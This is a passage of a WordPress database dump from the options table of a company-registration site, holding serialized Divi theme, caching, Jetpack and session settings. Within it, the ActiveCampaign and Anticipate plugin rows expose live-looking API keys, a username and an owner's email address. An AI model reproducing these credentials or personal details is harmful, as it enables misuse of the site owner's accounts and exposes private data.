gtag(\'js\', new Date());\r\n\r\n  gtag(\'config\', \'AW-734613449\');\r\n</script>\";s:27:\"divi_integration_single_top\";s:0:\"\";s:30:\"divi_integration_single_bottom\";s:0:\"\";s:15:\"divi_468_enable\";s:5:\"false\";s:14:\"divi_468_image\";s:0:\"\";s:12:\"divi_468_url\";s:0:\"\";s:16:\"divi_468_adsense\";s:0:\"\";s:25:\"3_0_flush_rewrite_rules_2\";s:4:\"done\";s:40:\"divi_email_provider_credentials_migrated\";b:1;s:32:\"et_fb_pref_settings_bar_location\";s:6:\"bottom\";s:30:\"et_fb_pref_modal_snap_location\";s:0:\"\";s:21:\"et_fb_pref_modal_snap\";s:5:\"false\";s:27:\"et_fb_pref_modal_fullscreen\";s:5:\"false\";s:32:\"et_fb_pref_modal_dimension_width\";i:567;s:33:\"et_fb_pref_modal_dimension_height\";i:429;s:27:\"et_fb_pref_modal_position_x\";i:213;s:27:\"et_fb_pref_modal_position_y\";i:71;s:13:\"color_schemes\";s:4:\"none\";s:23:\"secondary_nav_fullwidth\";b:1;s:18:\"secondary_nav_font\";b:0;s:16:\"secondary_nav_bg\";s:7:\"#c40079\";s:23:\"secondary_nav_font_size\";i:12;s:32:\"secondary_nav_dropdown_animation\";s:6:\"expand\";s:13:\"nav_fullwidth\";b:1;s:16:\"primary_nav_font\";b:0;s:21:\"primary_nav_font_size\";i:14;s:9:\"menu_link\";s:7:\"#444444\";s:23:\"primary_nav_dropdown_bg\";s:22:\"rgba(255,255,255,0.93)\";s:31:\"primary_nav_dropdown_line_color\";s:7:\"#c40079\";s:14:\"primary_nav_bg\";s:7:\"#ffffff\";s:31:\"primary_nav_dropdown_link_color\";s:7:\"#000000\";s:30:\"primary_nav_dropdown_animation\";s:6:\"expand\";s:17:\"hide_primary_logo\";b:0;s:12:\"boxed_layout\";b:0;s:13:\"content_width\";i:1080;s:12:\"header_style\";s:8:\"centered\";s:12:\"vertical_nav\";b:0;s:24:\"vertical_nav_orientation\";s:4:\"left\";s:12:\"phone_number\";s:0:\"\";s:25:\"divi_scroll_to_anchor_fix\";s:5:\"false\";s:15:\"hide_fixed_logo\";b:0;s:21:\"minimized_menu_height\";i:40;s:25:\"fixed_secondary_menu_link\";s:7:\"#ffffff\";s:8:\"hide_nav\";b:0;s:24:\"show_header_social_icons\";b:0;s:11:\"logo_height\";i:100;s:12:\"accent_color\";s:21:\"rgba(196,13,126,0.64)\";s:16:\"menu_link_active\";s:7:\"#c40079\";s:21:\"custom_footer_credits\";s:69:\"Designed By Digital Strategies.  Powered By www.digitalstrategies.biz\";s:11:\"menu_height\";i:101;s:21:\"et_pb_static_css_file\";s:2:\"on\";s:19:\"et_pb_css_in_footer\";s:2:\"on\";s:20:\"all_buttons_bg_color\";s:22:\"rgba(234,234,234,0.98)\";s:25:\"all_buttons_border_radius\";i:9;s:16:\"all_buttons_icon\";s:2:\"no\";s:39:\"static_css_custom_css_safety_check_done\";b:1;s:24:\"all_buttons_border_width\";i:3;s:22:\"all_buttons_text_color\";s:7:\"#0c71c3\";s:16:\"all_buttons_font\";s:4:\"Abel\";s:25:\"all_buttons_selected_icon\";s:3:\"\";s:22:\"all_buttons_icon_color\";s:7:\"#1e73be\";s:28:\"all_buttons_text_color_hover\";s:7:\"#1e73be\";s:30:\"all_buttons_border_color_hover\";s:7:\"#1e73be\";s:31:\"all_buttons_border_radius_hover\";i:15;s:24:\"all_buttons_border_color\";s:7:\"#ffffff\";s:25:\"secondary_nav_dropdown_bg\";s:19:\"rgba(0,86,237,0.78)\";s:33:\"secondary_nav_dropdown_link_color\";s:7:\"#ffffff\";s:17:\"use_sidebar_width\";b:1;s:28:\"secondary_nav_text_color_new\";s:7:\"#ffffff\";s:24:\"secondary_nav_font_style\";s:0:\"\";s:12:\"heading_font\";s:26:\"Encode Sans Semi Condensed\";s:9:\"body_font\";s:26:\"Encode Sans Semi Condensed\";s:14:\"body_font_size\";i:16;s:16:\"show_search_icon\";b:1;s:19:\"product_tour_status\";a:2:{i:1;s:3:\"off\";i:3;s:3:\"off\";}s:27:\"divi_skip_font_subset_force\";b:1;s:28:\"et_fb_pref_builder_animation\";s:4:\"true\";s:41:\"et_fb_pref_builder_display_modal_settings\";s:5:\"false\";s:21:\"et_fb_pref_event_mode\";s:5:\"hover\";s:32:\"et_fb_pref_hide_disabled_modules\";s:5:\"false\";s:28:\"et_fb_pref_history_intervals\";i:1;s:27:\"et_fb_pref_modal_preference\";s:7:\"default\";s:24:\"et_fb_pref_toolbar_click\";s:4:\"true\";s:26:\"et_fb_pref_toolbar_desktop\";s:4:\"true\";s:23:\"et_fb_pref_toolbar_grid\";s:4:\"true\";s:24:\"et_fb_pref_toolbar_hover\";s:5:\"false\";s:24:\"et_fb_pref_toolbar_phone\";s:4:\"true\";s:25:\"et_fb_pref_toolbar_tablet\";s:4:\"true\";s:28:\"et_fb_pref_toolbar_wireframe\";s:4:\"true\";s:23:\"et_fb_pref_toolbar_zoom\";s:4:\"true\";s:24:\"footer_widget_text_color\";s:7:\"#ffffff\";s:24:\"footer_widget_link_color\";s:7:\"#ffffff\";s:17:\"body_header_style\";s:0:\"\";s:19:\"body_header_spacing\";i:1;s:18:\"body_header_height\";d:1;s:21:\"et_pb_layouts_updated\";b:1;s:30:\"library_removed_legacy_layouts\";b:1;s:39:\"et_fb_pref_builder_enable_dummy_content\";s:4:\"true\";s:15:\"section_padding\";i:1;s:20:\"fixed_primary_nav_bg\";s:7:\"#5b5b5b\";s:12:\"header_email\";s:0:\"\";s:12:\"gutter_width\";i:3;s:26:\"all_buttons_bg_color_hover\";s:18:\"rgba(68,68,68,0.2)\";s:31:\"divi_previous_installed_version\";s:6:\"3.26.6\";s:29:\"divi_latest_installed_version\";s:6:\"3.27.3\";s:29:\"et_fb_pref_page_creation_flow\";s:7:\"default\";s:12:\"divi_sidebar\";s:16:\"et_right_sidebar\";s:27:\"divi_minify_combine_scripts\";s:2:\"on\";s:26:\"divi_minify_combine_styles\";s:2:\"on\";s:27:\"et_pb_post_type_integration\";a:5:{s:4:\"post\";s:2:\"on\";s:4:\"page\";s:2:\"on\";s:7:\"project\";s:2:\"on\";s:7:\"product\";s:2:\"on\";s:14:\"cartflows_step\";s:3:\"off\";}s:25:\"et_pb_product_tour_global\";s:2:\"on\";s:30:\"3_0_flush_rewrite_rules_3.18.4\";s:4:\"done\";s:20:\"et_fb_pref_view_mode\";s:7:\"desktop\";s:30:\"3_0_flush_rewrite_rules_3.18.6\";s:4:\"done\";s:30:\"3_0_flush_rewrite_rules_3.19.6\";s:4:\"done\";s:30:\"3_0_flush_rewrite_rules_3.19.7\";s:4:\"done\";s:30:\"3_0_flush_rewrite_rules_3.19.9\";s:4:\"done\";s:24:\"et_enable_classic_editor\";s:3:\"off\";s:31:\"3_0_flush_rewrite_rules_3.19.12\";s:4:\"done\";s:30:\"et_flush_rewrite_rules_library\";s:6:\"3.27.3\";s:26:\"divi_bfb_optin_modal_shown\";s:3:\"yes\";s:42:\"et_fb_pref_quick_actions_always_start_with\";s:7:\"nothing\";s:44:\"et_fb_pref_quick_actions_show_recent_queries\";s:3:\"off\";s:39:\"et_fb_pref_quick_actions_recent_queries\";s:0:\"\";s:40:\"et_fb_pref_quick_actions_recent_category\";s:0:\"\";s:21:\"all_buttons_font_size\";i:20;s:22:\"all_buttons_font_style\";s:4:\"bold\";s:24:\"divi_show_instagram_icon\";s:5:\"false\";s:18:\"divi_instagram_url\";s:1:\"#\";s:24:\"primary_nav_font_spacing\";i:-1;s:23:\"builder_custom_defaults\";O:8:\"stdClass\":4:{s:21:\"all_buttons_font_size\";O:8:\"stdClass\":0:{}s:24:\"all_buttons_border_width\";O:8:\"stdClass\":0:{}s:25:\"all_buttons_border_radius\";O:8:\"stdClass\":0:{}s:22:\"all_buttons_font_style\";O:8:\"stdClass\":0:{}}s:33:\"customizer_settings_migrated_flag\";b:1;s:34:\"builder_custom_defaults_unmigrated\";b:0;s:31:\"builder_custom_defaults_history\";O:8:\"stdClass\":2:{s:7:\"history\";a:6:{i:0;O:8:\"stdClass\":3:{s:8:\"settings\";O:8:\"stdClass\":4:{s:21:\"all_buttons_font_size\";O:8:\"stdClass\":1:{s:0:\"\";s:2:\"20\";}s:24:\"all_buttons_border_width\";O:8:\"stdClass\":1:{s:0:\"\";s:1:\"3\";}s:25:\"all_buttons_border_radius\";O:8:\"stdClass\":1:{s:0:\"\";s:1:\"9\";}s:22:\"all_buttons_font_style\";O:8:\"stdClass\":1:{s:0:\"\";s:4:\"bold\";}}s:4:\"time\";i:1565272146263;s:5:\"label\";s:20:\"Imported From Layout\";}i:1;O:8:\"stdClass\":3:{s:8:\"settings\";O:8:\"stdClass\":4:{s:21:\"all_buttons_font_size\";O:8:\"stdClass\":1:{s:0:\"\";s:2:\"20\";}s:24:\"all_buttons_border_width\";O:8:\"stdClass\":1:{s:0:\"\";s:1:\"3\";}s:25:\"all_buttons_border_radius\";O:8:\"stdClass\":1:{s:0:\"\";s:1:\"9\";}s:22:\"all_buttons_font_style\";O:8:\"stdClass\":1:{s:0:\"\";s:4:\"bold\";}}s:4:\"time\";i:1565685033614;s:5:\"label\";s:20:\"Imported From Layout\";}i:2;O:8:\"stdClass\":3:{s:8:\"settings\";O:8:\"stdClass\":4:{s:21:\"all_buttons_font_size\";O:8:\"stdClass\":1:{s:0:\"\";s:2:\"20\";}s:24:\"all_buttons_border_width\";O:8:\"stdClass\":1:{s:0:\"\";s:1:\"3\";}s:25:\"all_buttons_border_radius\";O:8:\"stdClass\":1:{s:0:\"\";s:1:\"9\";}s:22:\"all_buttons_font_style\";O:8:\"stdClass\":1:{s:0:\"\";s:4:\"bold\";}}s:4:\"time\";i:1565765338463;s:5:\"label\";s:20:\"Imported From Layout\";}i:3;O:8:\"stdClass\":3:{s:8:\"settings\";O:8:\"stdClass\":4:{s:21:\"all_buttons_font_size\";O:8:\"stdClass\":1:{s:0:\"\";s:2:\"20\";}s:24:\"all_buttons_border_width\";O:8:\"stdClass\":1:{s:0:\"\";s:1:\"3\";}s:25:\"all_buttons_border_radius\";O:8:\"stdClass\":1:{s:0:\"\";s:1:\"9\";}s:22:\"all_buttons_font_style\";O:8:\"stdClass\":1:{s:0:\"\";s:4:\"bold\";}}s:4:\"time\";i:1565772912576;s:5:\"label\";s:20:\"Imported From Layout\";}i:4;O:8:\"stdClass\":3:{s:8:\"settings\";O:8:\"stdClass\":4:{s:21:\"all_buttons_font_size\";O:8:\"stdClass\":1:{s:0:\"\";s:2:\"20\";}s:24:\"all_buttons_border_width\";O:8:\"stdClass\":1:{s:0:\"\";s:1:\"3\";}s:25:\"all_buttons_border_radius\";O:8:\"stdClass\":1:{s:0:\"\";s:1:\"9\";}s:22:\"all_buttons_font_style\";O:8:\"stdClass\":1:{s:0:\"\";s:4:\"bold\";}}s:4:\"time\";i:1565876953999;s:5:\"label\";s:20:\"Imported From Layout\";}i:5;O:8:\"stdClass\":3:{s:8:\"settings\";r:226;s:4:\"time\";i:1565942139655;s:5:\"label\";s:20:\"Imported From Layout\";}}s:5:\"index\";s:1:\"5\";}}','yes'),(43519,'et_images_temp_folder','/home/digit626/companyregistration.online/wp-content/uploads/et_temp','yes'),(43520,'et_schedule_clean_images_last_time','1566477602','yes'),(43521,'theme_mods_Divi','a:7:{s:21:\"et_pb_layouts_updated\";s:3:\"yes\";s:39:\"et_updated_layouts_built_for_post_types\";s:3:\"yes\";s:30:\"et_pb_predefined_layouts_added\";s:2:\"on\";s:34:\"et_pb_predefined_layouts_version_2\";s:2:\"on\";s:16:\"et_pb_css_synced\";s:3:\"yes\";s:18:\"nav_menu_locations\";a:3:{s:12:\"primary-menu\";i:188;s:14:\"secondary-menu\";i:13;s:11:\"footer-menu\";i:15;}s:18:\"custom_css_post_id\";i:-1;}','yes'),(44572,'ossdl_off_cdn_url','https://companyregistration.online','yes'),(44573,'ossdl_off_include_dirs','wp-content,wp-includes','yes'),(44574,'ossdl_off_exclude','.php','yes'),(44575,'ossdl_cname','','yes'),(44578,'wpsupercache_start','1467277558','yes'),(44579,'wpsupercache_count','0','yes'),(44582,'wpsupercache_gc_time','1563888520','yes'),(44583,'supercache_stats','a:3:{s:9:\"generated\";i:1563889480;s:10:\"supercache\";a:5:{s:7:\"expired\";i:0;s:6:\"cached\";i:0;s:5:\"fsize\";i:0;s:11:\"cached_list\";a:0:{}s:12:\"expired_list\";a:0:{}}s:7:\"wpcache\";a:5:{s:7:\"expired\";i:0;s:6:\"cached\";i:0;s:5:\"fsize\";i:0;s:11:\"cached_list\";a:0:{}s:12:\"expired_list\";a:0:{}}}','yes'),(44736,'theme_mods_ChildThemeDivi','a:10:{s:21:\"et_pb_layouts_updated\";s:3:\"yes\";s:39:\"et_updated_layouts_built_for_post_types\";s:3:\"yes\";s:30:\"et_pb_predefined_layouts_added\";s:2:\"on\";s:34:\"et_pb_predefined_layouts_version_2\";s:2:\"on\";s:18:\"nav_menu_locations\";a:3:{s:11:\"footer-menu\";i:15;s:14:\"secondary-menu\";i:13;s:12:\"primary-menu\";i:188;}s:18:\"custom_css_post_id\";i:27999;s:16:\"et_pb_css_synced\";s:3:\"yes\";s:21:\"et_pb_replace_content\";s:2:\"on\";s:34:\"et_pb_predefined_layouts_version_6\";s:2:\"on\";s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1566482607;s:4:\"data\";a:8:{s:19:\"wp_inactive_widgets\";a:1:{i:0;s:8:\"search-4\";}s:9:\"sidebar-1\";a:4:{i:0;s:25:\"woocommerce_widget_cart-2\";i:1;s:28:\"woocommerce_product_search-2\";i:2;s:38:\"woocommerce_recently_viewed_products-2\";i:3;s:32:\"woocommerce_top_rated_products-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}s:9:\"sidebar-4\";a:0:{}s:9:\"sidebar-5\";a:0:{}s:9:\"sidebar-6\";a:0:{}s:9:\"sidebar-7\";a:0:{}}}}','yes'),(46904,'_wp_session_expires_436073fd8f981e80b5bf7d9af83e392d','2966819668','no'),(46910,'_wp_session_436073fd8f981e80b5bf7d9af83e392d','a:1:{s:12:\"logged_in_at\";i:1467638234;}','no'),(46951,'_wp_session_27aac8debb4fde6de54902c8e665233b','a:1:{s:12:\"logged_in_at\";i:1467643198;}','no'),(46952,'_wp_session_expires_27aac8debb4fde6de54902c8e665233b','2966829596','no'),(48922,'_wp_session_1898a87210ebe6911f9c90be3bc7c268','a:1:{s:12:\"logged_in_at\";i:1467929848;}','no'),(48924,'_wp_session_expires_1898a87210ebe6911f9c90be3bc7c268','2967402964','no'),(49291,'_wp_session_expires_28f7ef33660b1b8b63d45f8447749c06','2967489910','no'),(49404,'et_divi_builder_plugin','a:0:{}','yes'),(49466,'_wp_session_expires_7e0f0531c5b2da9ef163f9af3a7f2a7f','2967522090','no'),(49622,'_wp_session_expires_690c230d32816a428e50a27615d841a0','2967565308','no'),(49874,'_wp_session_expires_9a98f0a5b0d86d52d99d33dd8a1e9877','2967622806','no'),(50764,'_wp_session_a439fe2f234f4ff0b9603bd6d2bde5b9','a:1:{s:12:\"logged_in_at\";i:1468254540;}','no'),(50765,'_wp_session_expires_a439fe2f234f4ff0b9603bd6d2bde5b9','2968052280','no'),(51110,'_wp_session_expires_7ef3d7b1f88da582801f8aad937abc47','2968194992','no'),(51551,'_wp_session_expires_fb04203d714dc945372676a4aaa7e06b','2968421202','no'),(51555,'_wp_session_fb04203d714dc945372676a4aaa7e06b','a:1:{s:12:\"logged_in_at\";i:1468439001;}','no'),(56434,'_wp_session_cb02dbc85e891d8853f5b8895405c365','a:1:{s:12:\"logged_in_at\";i:1469787481;}','no'),(56435,'_wp_session_expires_cb02dbc85e891d8853f5b8895405c365','2971118162','no'),(56541,'settings_activecampaign','a:10:{s:7:\"api_url\";s:26:\"https://maw831.api-us1.com\";s:7:\"api_key\";s:72:\"fa7ad7dcbed82fe83b8fce10f709a8fc689038443742c59d62477758f318f46adc70dc88\";s:4:\"syim\";a:2:{i:1;s:4:\"swim\";i:5;s:4:\"swim\";}s:3:\"css\";a:1:{i:1;s:1:\"1\";}s:7:\"form_id\";a:1:{i:0;s:1:\"5\";}s:13:\"site_tracking\";s:1:\"1\";s:12:\"account_view\";a:14:{s:7:\"account\";s:23:\"maw831.activehosted.com\";s:5:\"email\";s:19:\"imraan@mawinc.co.za\";s:5:\"fname\";s:3:\"MAW\";s:5:\"lname\";s:4:\"Inc.\";s:5:\"cname\";s:25:\"maw.digitalstrategies.biz\";s:16:\"subscriber_limit\";s:4:\"1000\";s:16:\"subscriber_total\";s:1:\"3\";s:6:\"status\";s:6:\"nobody\";s:8:\"branding\";s:1:\"0\";s:11:\"result_code\";i:1;s:14:\"result_message\";s:30:\"Success: Something is returned\";s:13:\"result_output\";s:4:\"json\";s:9:\"http_code\";i:200;s:7:\"success\";i:1;}s:7:\"account\";s:23:\"maw831.activehosted.com\";s:14:\"tracking_actid\";i:251752119;s:5:\"forms\";a:2:{i:1;a:20:{s:2:\"id\";s:1:\"1\";s:4:\"name\";s:33:\"CoReg Google adwords Landing Page\";s:6:\"layout\";s:11:\"inline-form\";s:6:\"target\";i:1;s:9:\"messageid\";s:1:\"9\";s:10:\"conflistid\";i:0;s:11:\"redirecturl\";s:49:\"https://maw831.api-us1.com/f/thankyou.php?id=1&s=\";s:11:\"facebookurl\";s:0:\"\";s:10:\"managetext\";i:0;s:5:\"theme\";s:0:\"\";s:9:\"sendoptin\";b:0;s:11:\"waitpreview\";i:0;s:7:\"widthpx\";s:3:\"500\";s:8:\"disabled\";i:0;s:9:\"analytics\";i:0;s:8:\"branding\";i:1;s:10:\"baseformid\";s:0:\"\";s:13:\"subscriptions\";i:1;s:5:\"lists\";a:1:{i:0;i:5;}s:7:\"version\";i:2;}i:5;a:20:{s:2:\"id\";s:1:\"5\";s:4:\"name\";s:41:\"Popup on entry companyregistration.on;ine\";s:6:\"layout\";s:5:\"modal\";s:6:\"target\";i:1;s:9:\"messageid\";s:2:\"17\";s:10:\"conflistid\";i:0;s:11:\"redirecturl\";s:49:\"https://maw831.api-us1.com/f/thankyou.php?id=5&s=\";s:11:\"facebookurl\";s:0:\"\";s:10:\"managetext\";i:0;s:5:\"theme\";s:0:\"\";s:9:\"sendoptin\";b:0;s:11:\"waitpreview\";i:0;s:7:\"widthpx\";i:670;s:8:\"disabled\";i:0;s:9:\"analytics\";i:0;s:8:\"branding\";i:1;s:10:\"baseformid\";s:0:\"\";s:13:\"subscriptions\";i:2;s:5:\"lists\";a:1:{i:0;i:2;}s:7:\"version\";i:2;}}}','yes'),(57384,'_wp_session_1bc404ab56cf3ee07405c2a0c412cda4','a:1:{s:12:\"logged_in_at\";i:1470023177;}','no'),(57398,'_wp_session_expires_1bc404ab56cf3ee07405c2a0c412cda4','2971593006','no'),(57464,'_wp_session_expires_1ae8288d0a99c69b9a32fd7146bd67fd','2971625186','no'),(57589,'_wp_session_expires_09bfe8fdf5f5630f4d24444e575499f1','2971661962','no'),(57678,'_wp_session_expires_0fe2dba0cbc163a10e5bec9be0053ac1','2971688046','no'),(62261,'_wp_session_2f5980926f85e2935d47e2ab211e0859','a:1:{s:12:\"logged_in_at\";i:1471263817;}','no'),(62369,'_wp_session_expires_2f5980926f85e2935d47e2ab211e0859','2974079822','no'),(64119,'_wp_session_615d44f088b8f80b567488f8c540f5c7','a:1:{s:12:\"logged_in_at\";i:1471698311;}','no'),(64198,'jetpack_sync_settings_meta_blacklist','a:0:{}','yes'),(64199,'do_activate','0','yes'),(64222,'jetpack_constants_sync_checksum','a:16:{s:16:\"EMPTY_TRASH_DAYS\";i:2473281379;s:17:\"WP_POST_REVISIONS\";i:4261170317;s:26:\"AUTOMATIC_UPDATER_DISABLED\";i:4261170317;s:7:\"ABSPATH\";i:768661430;s:14:\"WP_CONTENT_DIR\";i:4191793102;s:9:\"FS_METHOD\";i:3577458903;s:18:\"DISALLOW_FILE_EDIT\";i:634125391;s:18:\"DISALLOW_FILE_MODS\";i:634125391;s:19:\"WP_AUTO_UPDATE_CORE\";i:634125391;s:22:\"WP_HTTP_BLOCK_EXTERNAL\";i:634125391;s:19:\"WP_ACCESSIBLE_HOSTS\";i:634125391;s:16:\"JETPACK__VERSION\";i:1373516444;s:12:\"IS_PRESSABLE\";i:634125391;s:15:\"DISABLE_WP_CRON\";i:634125391;s:17:\"ALTERNATE_WP_CRON\";i:634125391;s:20:\"WP_CRON_LOCK_TIMEOUT\";i:3994858278;}','yes'),(64248,'jetpack_callables_sync_checksum','a:26:{s:18:\"wp_max_upload_size\";i:3465992232;s:15:\"is_main_network\";i:734881840;s:13:\"is_multi_site\";i:734881840;s:17:\"main_network_site\";i:2265488761;s:8:\"site_url\";i:2265488761;s:8:\"home_url\";i:2265488761;s:16:\"single_user_site\";i:734881840;s:7:\"updates\";i:200264253;s:28:\"has_file_system_write_access\";i:4261170317;s:21:\"is_version_controlled\";i:734881840;s:10:\"taxonomies\";i:3368395668;s:10:\"post_types\";i:242912577;s:18:\"post_type_features\";i:3915714390;s:27:\"rest_api_allowed_post_types\";i:3787029403;s:32:\"rest_api_allowed_public_metadata\";i:223132457;s:24:\"sso_is_two_step_required\";i:734881840;s:26:\"sso_should_hide_login_form\";i:734881840;s:18:\"sso_match_by_email\";i:4261170317;s:21:\"sso_new_user_override\";i:734881840;s:29:\"sso_bypass_default_login_form\";i:734881840;s:10:\"wp_version\";i:1517333555;s:11:\"get_plugins\";i:2615591582;s:14:\"active_modules\";i:1273807614;s:16:\"hosting_provider\";i:769900095;s:6:\"locale\";i:1256278236;s:13:\"site_icon_url\";i:2476326214;}','yes'),(64288,'gravatar_disable_hovercards','0','yes'),(64290,'safecss_add','','yes'),(64291,'verification_services_codes','0','yes'),(64293,'open_graph_protocol_site_type','','yes'),(64294,'facebook_admins','a:0:{}','yes'),(64298,'safecss','','yes'),(64559,'_wp_session_expires_615d44f088b8f80b567488f8c540f5c7','2974965872','no'),(65297,'_wp_session_788c28db2580732aaa331ba967834730','a:1:{s:12:\"logged_in_at\";i:1471810896;}','no'),(65449,'_wp_session_expires_788c28db2580732aaa331ba967834730','2975167904','no'),(66400,'_wp_session_expires_cefe3f9b2ccfaf2aef041663d0fea306','2975304988','no'),(66622,'jetpack_next_sync_time','1471891535','yes'),(66877,'_wp_session_expires_22da68c91bbd2b83d27d0f03de4e6b14','2975336472','no'),(70949,'_wp_session_996188781303f0d78ecaf19ec2d58247','a:1:{s:12:\"logged_in_at\";i:1472388470;}','no'),(71068,'_wp_session_expires_996188781303f0d78ecaf19ec2d58247','2976325304','no'),(71504,'_wp_session_258796d012ec7937bf3be2b645ea934b','a:1:{s:12:\"logged_in_at\";i:1472414502;}','no'),(71531,'_wp_session_expires_258796d012ec7937bf3be2b645ea934b','2976372880','no'),(76525,'_wp_session_44e0caff257624e6e1fa747849418eba','a:1:{s:12:\"logged_in_at\";i:1473011925;}','no'),(76679,'_caldera_forms_tracking_allowed','dismiss','yes'),(76768,'_wp_session_expires_44e0caff257624e6e1fa747849418eba','2977573070','no'),(81594,'_wp_session_0164ae3173b31ab3389d3fb45de3df94','a:1:{s:12:\"logged_in_at\";i:1473508128;}','no'),(81858,'_wp_session_expires_0164ae3173b31ab3389d3fb45de3df94','2978566558','no'),(84251,'_wp_session_65969d67322b578ea25952edf51999e3','a:1:{s:12:\"logged_in_at\";i:1473781004;}','no'),(84367,'_wp_session_expires_65969d67322b578ea25952edf51999e3','2979108106','no'),(84418,'_wp_session_ed093d181f6a97a6300584497d696689','a:1:{s:12:\"logged_in_at\";i:1473784458;}','no'),(84419,'_wp_session_expires_ed093d181f6a97a6300584497d696689','2979112116','no'),(85065,'_wp_session_71d95bb08784620cce41371667d7f720','a:1:{s:12:\"logged_in_at\";i:1473844986;}','no'),(85066,'_wp_session_expires_71d95bb08784620cce41371667d7f720','2979233172','no'),(85813,'_wp_session_5f877c1a8c5b48a60b1ea75260188c79','a:1:{s:12:\"logged_in_at\";i:1473926016;}','no'),(85814,'_wp_session_expires_5f877c1a8c5b48a60b1ea75260188c79','2979395232','no'),(86235,'_wp_session_36a2326541af83746bde321eb0677df5','a:1:{s:12:\"logged_in_at\";i:1473964704;}','no'),(86236,'_wp_session_expires_36a2326541af83746bde321eb0677df5','2979472608','no'),(127835,'_wp_session_921e46c425f0c52c9c829de52baeeec2','a:1:{s:12:\"logged_in_at\";i:1476618293;}','no'),(128140,'jetpack_sync_settings_avoid_wp_cron','0','yes'),(128149,'jetpack_sync_full__constants_total','1','no'),(128150,'jetpack_sync_full__constants_config','1','no'),(128151,'jetpack_sync_full__functions_total','1','no'),(128152,'jetpack_sync_full__functions_config','1','no'),(128153,'jetpack_sync_full__options_total','1','no'),(128154,'jetpack_sync_full__options_config','1','no'),(128156,'jetpack_sync_full__constants_queued','1','no'),(128158,'jetpack_sync_full__functions_queued','1','no'),(128160,'jetpack_sync_full__options_queued','1','no'),(128163,'jpsq_full_sync_checkout','0:0','no'),(128164,'jetpack_sync_full__sent_started','1476622163','no'),(128185,'jpsq_sync_checkout','0:0','no'),(128345,'_wp_session_expires_921e46c425f0c52c9c829de52baeeec2','2984791688','no'),(128417,'_wp_session_1f3a53f9be323ae498ff5854968b4f0f','a:1:{s:12:\"logged_in_at\";i:1476625311;}','no'),(128881,'_wp_session_expires_1f3a53f9be323ae498ff5854968b4f0f','2984831784','no'),(146502,'_wp_session_6dbe1883695a40252589660064fdb9c7','a:1:{s:12:\"logged_in_at\";i:1478877744;}','no'),(146791,'_wp_session_expires_6dbe1883695a40252589660064fdb9c7','2989309594','no'),(148505,'_wp_session_91ea6b122a287bd4fc97243ce3ff8881','a:1:{s:12:\"logged_in_at\";i:1479049995;}','no'),(148563,'_wp_session_expires_91ea6b122a287bd4fc97243ce3ff8881','2989644628','no'),(154298,'_wp_session_78d53a9b599ead03e95b94d37e3cd0c1','a:1:{s:12:\"logged_in_at\";i:1479654035;}','no'),(154425,'_wp_session_expires_78d53a9b599ead03e95b94d37e3cd0c1','2990857302','no'),(155411,'_wp_session_6ef4defe08e530ddd23d073f566f3649','a:1:{s:12:\"logged_in_at\";i:1479736908;}','no'),(155626,'_wp_session_expires_6ef4defe08e530ddd23d073f566f3649','2991023128','no'),(159079,'_wp_session_a5b294f0151d9b2e7fd4957554b51616','a:1:{s:12:\"logged_in_at\";i:1480156168;}','no'),(159216,'_wp_session_expires_a5b294f0151d9b2e7fd4957554b51616','2991861584','no'),(159300,'jetpack_sync_full_config','a:3:{s:9:\"constants\";b:1;s:9:\"functions\";b:1;s:7:\"options\";b:1;}','no'),(159301,'jetpack_sync_full_enqueue_status','a:4:{s:9:\"constants\";a:3:{i:0;i:1;i:1;i:1;i:2;b:1;}s:9:\"functions\";a:3:{i:0;i:1;i:1;i:1;i:2;b:1;}s:7:\"options\";a:3:{i:0;i:1;i:1;i:1;i:2;b:1;}s:15:\"network_options\";b:0;}','no'),(159312,'widget_google_translate_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(159313,'widget_jetpack_my_community','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(159320,'jetpack_sync_https_history_main_network_site_url','a:5:{i:0;s:4:\"http\";i:1;s:4:\"http\";i:2;s:4:\"http\";i:3;s:4:\"http\";i:4;s:4:\"http\";}','yes'),(159321,'jetpack_sync_https_history_site_url','a:5:{i:0;s:4:\"http\";i:1;s:4:\"http\";i:2;s:4:\"http\";i:3;s:4:\"http\";i:4;s:4:\"http\";}','yes'),(159322,'jetpack_sync_https_history_home_url','a:5:{i:0;s:4:\"http\";i:1;s:4:\"http\";i:2;s:4:\"http\";i:3;s:4:\"http\";i:4;s:4:\"http\";}','yes'),(159627,'et_anticipate_settings','a:11:{s:18:\"et_anticipate_logo\";s:80:\"https://companyregistration.online/wp-content/plugins/Anticipate/images/logo.png\";s:18:\"et_anticipate_date\";s:16:\"12/05/2016 00:00\";s:30:\"et_anticipate_complete_percent\";s:2:\"95\";s:27:\"et_anticipate_content-pages\";a:1:{i:0;s:3:\"184\";}s:25:\"et_anticipate_twitter_url\";s:0:\"\";s:26:\"et_anticipate_facebook_url\";s:0:\"\";s:21:\"et_anticipate_rss_url\";s:40:\"https://companyregistration.online/feed/\";s:19:\"et_anticipate_cufon\";s:1:\"0\";s:8:\"username\";s:7:\"imraanw\";s:7:\"api_key\";s:40:\"55e63d22ae7a430c9760f35b0ef1c14af9b1a22d\";s:20:\"et_anticipate_emails\";s:0:\"\";}','yes'),(159668,'su_presets_heading','a:1:{s:9:\"last_used\";a:3:{s:2:\"id\";s:9:\"last_used\";s:4:\"name\";s:18:\"Last used settings\";s:8:\"settings\";a:6:{s:5:\"style\";s:7:\"default\";s:4:\"size\";s:2:\"13\";s:5:\"align\";s:6:\"center\";s:6:\"margin\";s:2:\"20\";s:5:\"class\";s:0:\"\";s:7:\"content\";s:134:\"Our website is is undergoing a overhaul in order to enhance the user experience.  The site will be back online on the 5 December 